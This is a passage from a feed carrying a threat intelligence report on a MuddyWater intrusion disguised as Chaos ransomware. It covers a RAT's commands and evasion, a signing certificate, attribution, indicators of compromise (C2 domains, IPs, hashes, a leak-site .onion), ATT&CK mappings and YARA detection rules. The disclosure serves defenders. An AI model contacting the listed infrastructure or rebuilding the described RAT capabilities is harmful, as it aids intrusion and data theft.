shell</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>cmd_stop</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Stop interactive shell</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>ps_start</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Start interactive PowerShell</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>ps_input</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Send input to PowerShell</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>ps_stop</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Stop interactive PowerShell</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>re_register</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Re-register with a new agent_id</span></p></td></tr></tbody></table><p><em>Table 4: Supported commands of the RAT</em></p><p style="direction: ltr;">⠀<br/><span style='font-size: undefined;'>The malware design is unorthodox, characterized by an inconsistent approach to concealment. While it utilizes </span><span style='font-size: undefined;'><strong>XOR</strong></span><span style='font-size: undefined;'> encoding (key: </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>0xAB</strong></span></span><span style='font-size: undefined;'>) to hide specific anti-analysis strings, such as VM detection keys and sandbox-related DLL names, critical indicators like file paths, RAT command strings, and JSON registration formats are left in plaintext. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This inconsistency extends to its interaction with the Import Address Table (IAT). While the malware dynamically </span><span style='font-size: undefined;'><strong>resolves certain sensitive APIs at runtime</strong></span><span style='font-size: undefined;'>, such as </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>CreateMutexA</strong></span></span><span style='font-size: undefined;'>, other highly suspicious functions like </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>CreatePipe</strong></span></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>CreateProcessA</strong></span></span><span style='font-size: undefined;'> remain statically linked. Notably, the developer dynamically loads the </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>Sleep</strong></span></span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>API via GetProcAddress despite it already being </span><span style='font-size: undefined;'><strong>statically imported</strong></span><span style='font-size: undefined;'> in the IAT.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>These architectural discrepancies suggest the author is </span><span style='font-size: undefined;'><strong>likely an unseasoned developer</strong></span><span style='font-size: undefined;'>. The mixture of static imports and visible strings provides significant telemetry for AV and EDR solutions to identify and stop the threat (confirmed during the incident response).</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Similar to </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>ms_upd.exe</strong></span></span><span style='font-size: undefined;'> during the hunt on public malware sharing platforms, we were able to find another sample (SHA256 3df9dcc45d2a3b1f639e40d47eceeafb229f6d9e7f0adcd8f1731af1563ffb90), implementing the same logic as </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>Game.exe</strong></span></span><span style='font-size: undefined;'> but masquerading itself as </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>WebView2.exe</strong></span></span><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Attribution remains challenging due to the absence of specialized attack patterns or known APT delivery vectors, such as NSIS used by Chinese APTs:</span></p><ul><li style="direction: ltr;"><a href="https://www.rapid7.com/blog/post/2025/05/22/nsis-abuse-and-srdi-shellcode-anatomy-of-the-winos-4-0-campaign/" target="_self"><span style='font-size: undefined;'>Read blog: NSIS Abuse and sRDI Shellcode: Anatomy of the Winos 4.0 Campaign</span></a></li><li><p style="direction: ltr;"><a href="https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/" target="_self"><span style='font-size: undefined;'>Read blog: The Chrysalis Backdoor: A Deep Dive into Lotus Blossom’s toolkit</span></a><span style='font-size: undefined;'></span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>However, the presence of a specific signing Certificate and work of other threat researchers made it easier.</span></p><h3 style="direction: ltr;">Certificate</h3><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>While the TA adopted the Chaos Ransomware brand to project a cybercriminal identity, the underlying infrastructure reveals a signature previously associated with infrastructure linked to the Iranian Ministry of Intelligence and Security (MOIS). The primary technical bridge to the APT group MuddyWater (Seedworm) is the code-signing certificate used to validate the malware samples.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>During the analysis of the downloader (</span><span style='font-size: undefined;'><span data-type='inlineCode'>ms_upd.exe</span></span><span style='font-size: undefined;'>), we identified a consistent digital signature:</span></p><table><colgroup data-width='682'><col style="width:23.020527859237536%"/><col style="width:76.97947214076247%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Field</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Value</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Name</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Donald Gay</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Issuer</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft ID Verified CS AOC CA 02</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Algorithm</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>sha384RSA</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Thumbprint</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>B674578D4BDB24CD58BF2DC884EAA658B7AA250C</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Serial Number</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>33 00 07 9A 51 C7 06 3E 66 05 3D 22 9B 00 00 00 07 9A 51</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Status</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Time-invalid (revoked shortly after deployment)</span></p></td></tr></tbody></table><p><em>Table 5: Certificate details</em></p><p>⠀</p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>The "Donald Gay" certificate is a known shared resource within MuddyWater’s toolkit. Alongside its frequent companion, "Amy Cherne," this identity forms a distinct cluster of Iranian MOIS-affiliated infrastructure. According to threat intelligence reports from March and April 2026, this specific certificate has been tied directly to MuddyWater’s "Operation Olalampo," a campaign targeting organizations across the U.S. and the MENA (Middle East and North Africa) regions. Historically, this identity was also used to sign Stagecomp (</span><span style='font-size: undefined;'><span data-type='inlineCode'>ms_upd.exe</span></span><span style='font-size: undefined;'>), a downloader for the Darkcomp backdoor (</span><span style='font-size: undefined;'><span data-type='inlineCode'>Game.exe</span></span><span style='font-size: undefined;'>), both of which are firmly attributed to MuddyWater by multiple global security vendors.</span></p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>Beyond the certificate, other technical artifacts solidify this attribution:</span></p><ul><li style="direction: ltr;"><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'><strong>Infrastructure overlap:</strong></span><span style='font-size: undefined;'> The domain </span><span style='font-size: undefined;'><span data-type='inlineCode'>moonzonet[.]com</span></span><span style='font-size: undefined;'>, which served as the C2 for </span><span style='font-size: undefined;'><span data-type='inlineCode'>ms_upd.exe</span></span><span style='font-size: undefined;'>, was linked to MuddyWater in early 2026 during a wave of activity targeting Israeli and Western organizations.</span></p></li><li style="direction: ltr;"><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'><strong>Execution tradecraft:</strong></span><span style='font-size: undefined;'> The group’s signature use of </span><span style='font-size: undefined;'><span data-type='inlineCode'>pythonw.exe</span></span><span style='font-size: undefined;'> to inject code into suspended processes remains a consistent hallmark of their deployment chain.</span></p></li><li style="direction: ltr;"><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'><strong>Social engineering technique:</strong></span><span style='font-size: undefined;'> The use of interactive Microsoft Teams sessions to harvest MFA and credentials aligns closely with the "IT Support" persona MuddyWater has refined throughout 2026.</span></p></li></ul><h2 style="text-align: justify;direction: ltr;">Attribution: The "Chaos" masquerade</h2><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>The convergence of technical and contextual evidence is consistent with attribution to MuddyWater with moderate confidence. The observed use of Chaos ransomware does not indicate a shift in the group’s underlying objectives, but rather reflects a consistent effort to obscure operational intent and complicate attribution. While attribution evasion is a common characteristic of state-affiliated actors, MuddyWater’s reported increase in operational activity as of early 2026, primarily involving cyber espionage and potential prepositioning for disruptive operations across Western and Middle Eastern networks, has likely intensified its reliance on deceptive false-flag operations.</span></p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>This assessment aligns with previously observed behavior. In late 2025, MuddyWater was linked to activity involving the Qilin RaaS ecosystem in an operation targeting an Israeli organization. Following the subsequent public attribution of that incident to the MOIS, it is plausible that the group adopted alternative ransomware branding, in this case Chaos, in an effort to reduce attribution risk and maintain a degree of plausible deniability.</span></p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>The use of a RaaS framework in this context may enable the actor to blur distinctions between state-sponsored activity and financially motivated cybercrime, thereby complicating attribution. Furthermore, the inclusion of extortion and negotiation elements could serve to focus defensive efforts on immediate impact, likely delaying the identification of underlying persistence mechanisms established via remote access tools such as </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>DWAgent</strong></span></span><span style='font-size: undefined;'> or </span><span style='font-size: undefined;'><span data-type='inlineCode'><strong>AnyDesk</strong></span></span><span style='font-size: undefined;'>.</span></p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>Notably, the apparent absence of file encryption, despite the presence of Chaos ransomware artifacts, represents a deviation from typical ransomware behavior. This inconsistency may indicate that the ransomware component functioned primarily as a facilitating or obfuscation mechanism, rather than as the primary objective of the intrusion. This deviation highlights a mismatch between typical profit-driven ransomware behavior and the actor’s apparent espionage objectives. It further suggests a likely explanation for the inconsistent data provided by the TA as an initial proof-of-compromise. </span></p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>Taken together, these technical indicators and procedural inconsistencies are indicative of a targeted, state-sponsored intrusion masquerading as opportunistic extortion activity.</span></p><h2 style="direction: ltr;">Conclusion</h2><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>This incident highlights the increasing convergence between state-sponsored intrusion activity and cybercriminal tradecraft. While the operation incorporated recognizable elements of ransomware campaigns, such as extortion messaging and leak site publication, the absence of encryption and the presence of established espionage techniques suggest that financial gain was unlikely to be the primary objective.</span></p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>The assessed link to MuddyWater indicates a continued evolution in the group’s operational approach, including the apparent use of RaaS ecosystems and branding to obscure attribution. This aligns with broader trends in which state-aligned actors adopt criminal tactics to introduce ambiguity and delay defensive response.</span></p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>This case underscores the importance of looking beyond overt ransomware indicators. Defenders should also focus on the underlying intrusion lifecycle. Techniques such as social engineering via enterprise communication platforms, credential harvesting with MFA manipulation, and the abuse of legitimate remote access tools remain critical enablers of compromise.</span></p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>Ultimately, this activity is best understood as a hybrid intrusion model, in which ransomware is leveraged not as an end goal but as a mechanism for concealment, coercion, and operational flexibility within a broader intelligence-driven campaign.</span></p><p style="text-align: justify;direction: ltr;"><span style='font-size: undefined;'>For additional blog posts and detailed analysis from Rapid7 Labs on all things cyber-related to the conflict, please visit our </span><a href="https://www.rapid7.com/research/iran-conflict-cyber-threats/"><span style='font-size: undefined;'>Iran Conflict Cyber Threat Intelligence Hub</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">Rapid7 Customers</h2><h3><span style='color:rgb(2, 3, 3);'>Indicators of compromise (IoCs)</span></h3><h4>File indicators</h4><table><colgroup data-width='1519.0412087912086'><col style="width:15.802152528977395%"/><col style="width:39.7619232779497%"/><col style="width:44.43592419307292%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>File Name</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>SHA 256</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Description</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>ms_upd.exe</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>24857fe82f454719cd18bcbe19b0cfa5387bee1022008b7f5f3a8be9f05e4d14</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Initial Downloader ms_upd.exe</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>DIDS.exe</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>a92d28f1d32e3a9ab7c3691f8bfca8f7586bb0666adbba47eab3e1a8faf7ecc0</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Initial Downloader found during hunt on public repositories</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>Game.exe</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>1319d474d19eb386841732c728acf0c5fe64aa135101c6ceee1bd0369ecf97b6</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>RAT found during hunt on public repositories</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>WebView2.exe</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>3df9dcc45d2a3b1f639e40d47eceeafb229f6d9e7f0adcd8f1731af1563ffb90</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>RAT</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>visualwincomp.txt</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>c86ab27100f2a2939ac0d4a8af511f0a1a8116ba856100aae03bc2ad6cb0f1e0</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Encrypted config holding C2 url and port information</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>WebView2Loader.dll</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>a47cd0dc12f0152d8f05b79e5c86bac9231f621db7b0e90a32f87b98b4e82f3a</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>DLL downloaded by ms_upd.exe</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>dwagent.exe</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>cd098eddb23f2d2f6c42271ca82803b0d5ac950cb82a9b8ae0928e83945a53df</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Remote Management Tool leveraged by the TA</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>dwagent.exe</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>cf3dfd1d6626fd2129abb7a5983c11827f4b0d497e2dba146a1889bd71f23cd5</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Renamed pythonw.exe</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>dwagsvc.exe</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>a3bac548b5bc91c526b4d6707623ddbd1a675aa952f0d1f9a0aa6f7230f09f23</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Service binary of DWService</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>dwaglnc.exe</span></p></td><td><p style="direction: ltr;">86e0197389f0573eb83ff53991f337d416124c7c8bd727721ef3d396cd5f65dc</p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Background and system tray binary of DWService</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>AnyDesk.exe</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>bfc1675ee1e358db8356f515aaded7962923e426aa0a0a1c0eddfc4dab053f89</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Remote Management Tool leveraged by the TA</span></p></td></tr></tbody></table><p>⠀</p><h4>Network indicators</h4><table><colgroup data-width='1500'><col style="width:36.333333333333336%"/><col style="width:63.66666666666667%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Indicator</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Description</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>adm-pulse[.]com</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Quick Assist themed phishing website</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>moonzonet[.]com</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>URL hosting a second stage RAT Game.exe</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>uploadfiler[.]com</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>C2 extracted from a config file visualwincomp.txt</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>77.110.107[.]235</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Source IP address of malicious Microsoft Teams activity</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>93.123.39[.]127</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Source IP address of malicious Microsoft Teams activity</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>172.86.126[.]208</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>C2 hosting initial downloader ms_upd.exe</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>116.203.208[.]186</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>IP contacted by renamed pythonw.exe</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>hptqq2o2qjva7lcaaq67w36jihzivkaitkexorauw7b2yul2z6zozpqd[.]onion</span></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chaos RaaS DLS</span></p></td></tr></tbody></table><p>⠀</p><h4>MITRE ATT&CK techniques</h4><table><colgroup data-width='1503'><col style="width:19.693945442448438%"/><col style="width:30.605455755156353%"/><col style="width:49.700598802395206%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>ATT&CK ID</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Name</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Use</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1566</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Phishing (Spearphishing via Service)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Initial access via Microsoft Teams messages and social engineering</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1059</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Command and Scripting Interpreter</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Execution of discovery commands (ipconfig, whoami, etc.)</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1082</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>System Information Discovery</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Gathering host-level information from compromised machines</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1016</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>System Network Configuration Discovery</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Identifying network configuration via commands like ipconfig</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1078</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Valid Accounts</span>	</p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Use of harvested credentials for authentication and access</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1056</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Input Capture</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Users entering credentials into attacker-directed files/pages</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1556</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Modify Authentication Process</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>MFA manipulation to add attacker-controlled devices</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1021.001</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Remote Services: RDP</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Remote access to internal systems via RDP sessions</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1219</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Remote Access Tools</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Use of DWAgent and AnyDesk for persistence and control</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1543</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Create or Modify System Process</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Installation of DWAgent as a service</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1055</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Process Injection / Proxy Execution</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Abuse of renamed Python binary for execution</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1105</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Ingress Tool Transfer</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Downloading payloads via curl (ms_upd.exe)</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1041</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Exfiltration Over C2 Channel</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Data exfiltration to external infrastructure</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1027</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Obfuscated/Encrypted Files or Information</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Encrypted configuration (visualwincomp.txt)</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1497</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Virtualization/Sandbox Evasion</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Anti-VM checks in Game.exe</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1622</span>	</p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Debugger Evasion</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Evasion techniques to avoid analysis</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1071</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Application Layer Protocol</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>C2 communication over web protocols</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1573</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Encrypted Channel</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Encrypted communication with C2 infrastructure</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1133</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>External Remote Services</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>VPN access using compromised accounts</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1087</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Account Discovery</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Identifying user accounts via commands</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1018</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Remote System Discovery</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Enumerating systems in the network</span></p></td></tr></tbody></table><p>⠀</p><h4>YARA rules</h4><pre language="html">rule MuddyWaterRAT{

	meta:
		author = "Ivan Feigl ivan_feigl@rapid7.com"
		description = "Hunting rule for the RAT used by the MuddyWater, based on plain text string. Original sample MD5 F8560B9A893EEB2130FC7159E9C1B851"

strings:


		//TKP - Token privilege 
		$TKP1 = "System"
		$TKP2 = "Admin"
		$TKP3 = "User"

        // DF - Data format
		$DF1 = "\"computer_name\":\""
		$DF2 = "\"username\":\"" 
		$DF3 = "\"domain\":\"" 
		$DF4 = "\"local_ip\":\"127.0.0.1\"" 
		$DF5 = "\"privilege\":\"" 
		$DF6 = "\"process_name\":\"agent-" 
		$DF7 = "\"version\":\"E.1.0\"" 
		$DF8 = "\"sleep_time\":60" 


        //IAT - Import address table
        $IAT1   = "GetComputerNameA"
        $IAT2   = "GetUserNameA"
        $IAT3   = "NetWkstaGetInfo"
        $IAT4   = "NetApiBufferFree"
        $IAT5   = "AllocateAndInitializeSid"
        $IAT6   = "OpenProcessToken"
        $IAT7   = "GetTokenInformation"
        $IAT8   = "EqualSid"
        $IAT9   = "CheckTokenMembership"

        //MSC - misc
        $MSC1 = "re_register"
        $MSC2 = "cmd_id"
        $MSC3 = "cmd_id"
        $MSC4 = "run_cmd"
        $MSC5 = "cmd_line"
        $MSC6 = "run_powershell"

		condition:
			uint16(0) == 0x5A4D  and all of($TKP*) and all of($DF*) and all of($IAT*) and all of ($MSC*) 
}

rule MuddyWaterDownloader{

	meta:
		author = "Ivan Feigl ivan_feigl@rapid7.com"
		description = "Hunting rule for the downloader used by the MuddyWater, based on plain text string. Original sample MD5 439C0A0A46627BD166E08436F383AD56"

	strings:


		//ST - Status
		$ST1 = "downloading"
		$ST2 = "running"
		$ST3 = "success"
		$ST4 = "error"

		//SFF - Scanf formats
		$SFF1 = "EXIT_%lu"
		$SFF2 = "RUN_%lu"
		$SFF3 = "DL_%s"

		//ICO - Internet communication operation 
		$ICO1 = "/register" ascii wide
		$ICO2 = "/check" ascii wide
		$ICO3 = "/status" ascii wide
        $ICO4 = "GET" ascii wide
        $ICO5 = "POST" ascii wide
        $ICO6 = "CONN_ERR" ascii wide
        $ICO7 = "REQ_ERR" ascii wide
        $ICO8 = "SEND_ERR" ascii wide
        $ICO9 = "RECV_ERR" ascii wide
        $ICO10 = "HTTP_%lu" ascii wide

        //FO - File operation
        $FO1 = "wb"
        $FO2 = "EMPTY"
        $FO3 = "FILE_ERR"

        // DF - Data format
        $DF1 = "\"client_id\":\"%s\""
        $DF2 = "\"status\":\"%s\""
        $DF3 = "\"error_code\":\"%s\""

        //IAT - Import address table
        $IAT1   = "GetLastError"
        $IAT2   = "Sleep"
        $IAT3   = "WinHttpOpen"
        $IAT4   = "WinHttpConnect"
        $IAT5   = "WinHttpOpenRequest"
        $IAT6   = "WinHttpSendRequest"
        $IAT7   = "WinHttpReceiveResponse"
        $IAT8   = "WinHttpReadData"
        $IAT9   = "WinHttpCloseHandle"
        $IAT10  = "DeleteFileA"



		condition:
			uint16(0) == 0x5A4D  and all of($ST*) and all of($SFF*) and all of($ICO*) and all of ($FO*) and all of ($DF*) and all of ($IAT*)
}</pre>]]></description>
      <link>https://www.rapid7.com/blog/post/tr-muddying-tracks-state-sponsored-shadow-behind-chaos-ransomware</link>
      <guid isPermaLink="false">blt2e721a7d0e6a5e85</guid>
      <category><![CDATA[Threat Intel]]></category>
      <category><![CDATA[Labs]]></category><dc:creator><![CDATA[Alexandra Blia]]></dc:creator>
      <pubDate>Wed, 06 May 2026 13:00:27 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt83e3180716d766f0/69b180eb669f1ce1a02fe1aa/Purple-teaming-in-2026-hero.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[A Walkthrough of the 2026 Global Cybersecurity Summit Agenda]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>The full agenda for the Rapid7 </span><a href="https://rapid7.brighttalk.com/?utm_source=blog&amp;utm_medium=website&amp;utm_content=blog-8&amp;utm_campaign=global-pla-2026-global-virtual-summit-prospect-eng-etos-25" target="_blank"><span style='font-size: undefined;'>2026 Global Cybersecurity Summit</span></a><span style='font-size: undefined;'> is now live, and it gives a clearer sense of how the conversation around security operations is evolving.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Across two days, the sessions progress from a shared understanding of how threats are changing into a more detailed look at how teams detect, respond, and make decisions in practice.</span></p><h2 style="direction: ltr;">Day 1: How threats evolve and how teams respond</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The day opens with a keynote, </span><span style='font-size: undefined;'><em>Defense Starts Earlier Than You Think</em></span><span style='font-size: undefined;'>, where Brian Castagna is joined by Craig Robinson, Research Vice President at IDC, to examine why complexity has become the main barrier to effective security and what changes when teams start acting earlier.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>That context carries into </span><span style='font-size: undefined;'><em>The Reality of Running a SOC in 2026</em></span><span style='font-size: undefined;'>, featuring Raj Samani alongside Rachel Tobac, CEO of SocialProof Security, and Graham Cluley, cybersecurity speaker and podcast host. The discussion focuses on how attacks actually begin, from identity misuse to cloud misconfigurations, and why defenders often fall behind as those attacks evolve.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In 